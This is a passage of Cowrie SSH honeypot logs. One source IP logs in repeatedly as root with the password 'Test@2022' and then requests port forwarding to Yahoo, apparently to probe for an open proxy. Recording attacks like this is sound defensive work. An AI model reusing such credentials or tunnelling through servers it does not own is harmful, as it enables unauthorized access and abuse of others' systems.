"aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.038797Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.274085Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":15178,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15178","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.322259Z","session":"4ac60349e2cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.369579Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25276,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25276","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.513629Z","session":"4ac60349e2cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.560903Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.609313Z","src_ip":"213.209.150.239","session":"4ac60349e2cb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26416,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7bf735ef1d7","protocol":"ssh","message":"New connection: 213.209.150.239:26416 (1.2.3.4:22) [session: d7bf735ef1d7]","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.664819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.666153Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:17.722797Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.005536Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29389,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29389","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.063498Z","session":"d7bf735ef1d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.120407Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1321,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1321","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.275187Z","session":"d7bf735ef1d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.331733Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.389444Z","src_ip":"213.209.150.239","session":"d7bf735ef1d7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26477,"dst_ip":"1.2.3.4","dst_port":22,"session":"42d3791c1b0f","protocol":"ssh","message":"New connection: 213.209.150.239:26477 (1.2.3.4:22) [session: 42d3791c1b0f]","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.435937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.436765Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.484148Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.719544Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":2780,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:2780","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.767548Z","session":"42d3791c1b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.814842Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30439,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30439","sensor":"my-vps","timestamp":"2025-08-26T01:03:18.953657Z","session":"42d3791c1b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.000924Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.049237Z","src_ip":"213.209.150.239","session":"42d3791c1b0f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26521,"dst_ip":"1.2.3.4","dst_port":22,"session":"4afc900e56a2","protocol":"ssh","message":"New connection: 213.209.150.239:26521 (1.2.3.4:22) [session: 4afc900e56a2]","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.095474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.096215Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.143356Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.378315Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14984,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14984","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.427350Z","session":"4afc900e56a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.474518Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2231,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2231","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.609594Z","session":"4afc900e56a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.656924Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.704943Z","src_ip":"213.209.150.239","session":"4afc900e56a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26563,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cc7324df3db","protocol":"ssh","message":"New connection: 213.209.150.239:26563 (1.2.3.4:22) [session: 9cc7324df3db]","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.751255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.751988Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:19.799269Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.034132Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17068,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17068","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.082267Z","session":"9cc7324df3db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.129532Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":15715,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15715","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.265493Z","session":"9cc7324df3db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.312793Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.360698Z","src_ip":"213.209.150.239","session":"9cc7324df3db"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26618,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f38abf4b0a","protocol":"ssh","message":"New connection: 213.209.150.239:26618 (1.2.3.4:22) [session: c2f38abf4b0a]","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.416243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.426348Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.473819Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.755828Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20605,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20605","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.813192Z","session":"c2f38abf4b0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:20.869789Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24816,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24816","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.023090Z","session":"c2f38abf4b0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.079866Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
